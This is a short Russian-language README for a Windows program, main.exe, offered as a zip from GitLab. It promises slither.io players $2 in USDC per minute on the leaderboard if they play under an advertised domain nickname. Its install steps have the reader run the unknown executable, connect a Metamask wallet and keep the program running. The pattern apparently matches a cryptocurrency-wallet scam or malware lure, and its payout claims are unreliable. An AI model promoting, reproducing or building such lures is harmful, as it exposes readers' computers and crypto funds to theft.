# О проэкте
Программа продвижения интернет сайтов через slither.io онлайн игру.

![slither logo](slither.jpeg)

# Бизнес модель

Никнейм (nickname),  под которым вы играете, является доменным именем (domain name), которое мы рекламируем. Рекламодатель платит нашей компании за рекламу среди игроков slither и вы получаете часть этой платы. 

Отслеживание вашего прогресса в игре, а также выплаты, осуществляются нашим ПО. 
Все выплаты производятыся в USDC токенах на нетворке BINANCE.

# Установка

1. Распакуйте архив в любою папку.
2. Запустите программу `main.exe`.
3. Нажмите `ENTER` принять стандартный дисклеймер. Это требуется только при первом запуске программы.
4. Программа открывает таб в интернет браузере, используемый системой по умолчанию.
5. Подключите ваш Metamask аккаунт, который будет получать денежные переводы в USDC.
6. Скопируйте никнейм, который вам выдала система.
7. Откройте онлайн игру slither.io.
8. Используйте выданный вам никнейм.
9. После достижения вам таблицы лидеров, система будет перечислять на указанный вами аддрес **2$ за каждую минуту** нахождения в таблице лидеров. 
10. Не выключайте `main.ехе` пока вы играете и зарабатываете. Эта программа отслеживает ваш прогресс и выплачивает ваш гонорар.

**Как выглядит страница подключения**

![dash](dash.ru.png)

**Посмотреть ДЕМО**

https://gitlab.com/adsrv/slither/-/blob/main/DEMO.mp4

**Загрузить**

https://gitlab.com/adsrv/slither/-/blob/main/adslither.win10-v1.0.0.zip
